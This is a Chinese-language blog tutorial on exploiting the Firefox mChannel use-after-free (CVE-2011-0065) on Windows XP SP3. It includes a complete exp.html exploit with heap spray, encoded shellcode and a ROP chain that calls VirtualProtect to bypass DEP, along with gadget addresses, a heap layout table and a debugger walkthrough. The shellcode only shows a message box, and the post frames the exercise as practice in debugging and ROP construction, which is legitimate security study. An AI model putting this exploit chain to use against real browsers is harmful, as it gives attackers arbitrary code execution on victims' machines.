• Rop实战之利用VirtualProtect绕过DEP


    CVE-2011-0065 Firefox mChannel UAF漏洞

    为了实现任意代码执行,需要在mChannel对象释放后,用可控数据“占坑”填充它,因此,可在onChannelRedirect函数调用完成后,紧跟着申请一块大小相同的内存:

    e = document.getElementById("d");
    
    e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
    
    fake_obj_addr = unescape("x1C%u0c0c")
    

      

    执行后,虚表指针就会被0x0c0c001c填充,从而控制程序的执行流程,如下图

     

    接下来,只需利用Heap Spray技术将shellcode喷射到0x0c0c0034的位置即可实现任意代码执行:

    #######exp.html
    
    <html>
    
    <body>
    
    <object id="d"><object>
    
    <script type="text/javascript">
    
     
    
    e = document.getElementById("d");
    
    e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
    
    fake_obj_addr = unescape("x1C%u0c0c")
    
     
    
    var shellcode =
    
    unescape("%u4141%u4141%u0038%u0c0c%uc012%u0038%u0c0c%u4141%uA2EC%u7D66%u003c%u0c0c%u476c%u7C47%u4141%u4141%u0090%u0c0c%u4141%u4141%u4141%u4141%u323b%u1042%u1ad4%u7c80%u0084%u0c0c%u0090%u0c0c%u0400%u0000%u1A61%u7C80%u0090%u0c0c%uffff%uffff%u0000%u0c00%u0000%u0010%u0040%u0000%u0024%u0c0c%u0090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%udb33%u6853%u6c72%u2020%u6e68%u6761%u6869%u6d20%u6f6f%u6968%u6120%u8b6d%u53c4%u5050%ub853%u085c%u77d5%ud0ff%ub853%ucafa%u7c81%ud0ff%u9090%u9090")
    
     
    
    var ret_addr = unescape("%u0024%u0c0c")
    
    while(ret_addr.length+20+8 < 0x100000-18-12-12-12) {ret_addr += ret_addr}
    
    var b = ret_addr.substring(0,(0x48-0x24)/2)
    
    b += shellcode
    
    b += ret_addr
    
    var next = b.substring(0,0x10000/2)
    
    while(next.length<0x800000) {next += next}
    
    var again = next.substring(0,0x80000 - (0x1020-0x08)/2)
    
    array = new Array()
    
    for (n=0;n<0x1f0;n++){
    
      array[n] = again + shellcode
    
    }
    
     
    
    e.data = ""
    
       
    
    </script>
    
    </body>
    
    </html>
    

      

    1 VirtualProtect函数

    由于Windows xp sp3开启了DEP保护,所以我们要绕过DEP保护才能执行shellcode,本文采用ROP方式调用VirtualProtect方法绕过DEP

    首先我们来看看 MSDN 上对 VirtualProtect 函数的说明。

    BOOL VirtualProtect (
    LPVOID lpAddress,
    DWORD dwSize,
    DWORD flNewProtect,
    PDWORD lpflOldProtect
    );
    

      

    各参数的意义为:
    lpAddress,要改变属性的内存起始地址。
    dwSize,要改变属性的内存区域大小。
    flNewProtect,内存新的属性类型,设置为 PAGE_EXECUTE_READWRITE( 0x40)时该内存页为可读可写可执行。
    pflOldProtect,内存原始属性类型保存地址。
    修改内存属性成功时函数返回非 0,修改失败时返回 0。
    如果我们能够按照如下参数布置好栈帧的话就可以将 shellcode 所在内存区域设置为可执行模式

    BOOL VirtualProtect(
    shellcode 所在内存空间起始地址,
    shellcode 大小,
    0x40,
    某个可写地址
    );

    其实通过汇编代码我们会发现其实VirtualProtect有五个参数,

     

    -1(0xffffffff)参数代表进程句柄,构造参数时设为0xffffffff即可

    2 ROP序列

    ROP中要用到的三个关键程序片段

    片段一*************************************************************************
    
    7D66A2EC    8B49 0C         mov ecx,dword ptr ds:[ecx+0xC] 
    
    7D66A2EF    8B01            mov eax,dword ptr ds:[ecx]     
    
    7D66A2F1    52               push edx
    
    7D66A2F2    51               push ecx
    
    7D66A2F3    FF50 14          call dword ptr ds:[eax+0x14]   
    
    片段二*************************************************************************
    
    1042323b                     push eax
    
                                 pop esp
    
                                 retn 0c  
    
    片段三*************************************************************************
    
    7C47476C   83C4 18          ADD ESP,18  
    
    7C47476F   C3               RETN   
    
     
    

      

    三个片段地址寻找是通过immunity inc 的mona插件和 ollydbg的ollyFindAddr插件寻找的

    3.3 Shellcode布局

    Shellcode布局:

    堆地址

    备注

    0c0c0024

    %u4141%u4141

    填充

    0c0c0028

    %u0038%u0c0c

    堆地址

    0c0c002c

    %u4141%u4141

    填充

    0c0c0030

    %u4141%u4141

    填充

    0c0c0034

    %uA2EC%u7D66

    片段一地址

    0c0c0038

    %u003c%u0c0c

    堆地址

    0c0c003c

    %u476c%u7C47

    片段三地址

    0c0c0040 - 0c0c004c

    %u4141%u4141

    填充

    0c0c0050

    %u323b%u1042

    片段二地址

    0c0c0054 - 0c0c0060

    %u4141%u4141

    填充

    0c0c0064

    %u1A61%u7C80

    VirtualProtectEx函数首地址

    0c0c0068

    %0090d%u0c0c

    弹窗代码首地址(堆地址)

    0c0c006c

    %uffff%uffff

    VirtualProtectEx参数一(-1)

    0c0c0070

    %u0000%u0c00

    shellcode 所在内存空间起始地址

    0c0c0074

    %u0000%u0010

    shellcode 大小(堆块大小)

    0c0c0078

    %u0040%u0000

    0x40

    0c0c007c

    %u0024%u0c0c

    可写地址(堆地址)

    0c0c0080 – 0c0c008c

    %u0090%u9090

    Nop指令

    0c0c0090

    %udb33%u6853

    %u6c72%u2020

    %u6e68%u6761

    %u6869%u6d20

    %u6f6f%u6968

    %u6120%u8b6d

    %u53c4%u5050

    %ub853%u085c

    %u77d5%ud0ff

    %u77d5%ud0ff

    %ub853%ucafa

    %u7c81%ud0ff

    弹窗代码

     

    下面我们跟着我们的exp.html动态跟踪一下exploit过程:

    首先我们来到对象调用虚函数这里,此时我们已经劫持了程序流程,虚函数指针为0c0c001c,

    正在调用位于【ecx + 18h】的虚函数,可以看到此时调用的虚函数已经被我们覆盖成片段一的首地址,所以我们会执行片段一中的内容

    按F11进入

    这里执行片段一的内容,片段一执行到最后,eax的值为0c0c003c,ecx的值为0c0c0038

    最后跳转到【eax + 14h】所指的地址,即0c0c0050所指的地址,此时0c00050中已经被我们覆盖为1042323b,即片段二的首地址,接下来将执行片段二

    按F11进入

    片段二执行完毕后,esp的值为0c0c003c,可以看到从现在开始堆成为了栈,这是很重要的,

    片段二执行完毕后,将返回【esp】,即0c0c003c所指向的地址,我们已经将0c0c003c覆盖为片段三的首地址7C47476C,于此同时,esp的值加(4 + 0ch),变为0c0c004c

    按F10进入

     

    执行片段三的内容,执行完后,esp的值变为0c0c0064,执行完后,进入[esp],即0c0c0064中内容所指向的地址,此时0c0c0064内容已经被我们覆盖为VirtualProtectEX函数的首地址7C801A61。

    于此同时我们可以看一下此时‘栈’里的情况

     

    可以看到,此时栈中返回地址和VirtualProtectEX参数已经都排列好了

    继续按F10运行

    这里就是执行VirtualProtectEX函数将当前堆内存权限设置为可读可写可执行,我们直接运行到函数末尾

    此时VirtualProtectEX已经执行完毕,接下来要返回到【esp】,即0c0c0068内容所指向的地址去执行,而0c0c0068已经被我们覆盖为0c0c0090,也就是我们存放弹窗代码的首地址,如果我们成功绕过了DEF,那么我们就能执行弹窗指令了。

    按F10继续

     

    我们已经来到了最后一步,我们先看看当前内存权限

     

    可以看到,当前内存权限为可读可写可执行,于是我们直接按g执行弹窗代码

     

     

    4 最后

    整个实验到此结束,这实验主要考察调试能力和找ROP链能力,以及shellcode排布和函数运行时栈的情况也要了解,除了用VirtualProtect函数,当然还可以用ZwSetInformationProcess或者VirtualAlloc函数绕过DEP

  • 相关阅读:
    极客技术专题【008期】:CSS3核心技术:选择器
    10670 Work Reduction (贪心 + 被题意坑了- -)y
    hdu 4617 : Weapon
    [poj 2186]Popular Cows[Tarjan强连通分量]
    caldera
    linux内核书籍
    DedeCMS Error:Tag disabled:"php"的解决办法
    China特色创新现状
    麒麟OS剽窃
    国产系统
  • 原文地址:https://www.cnblogs.com/elvirangel/p/8410904.html
Copyright © 2020-2023  润新知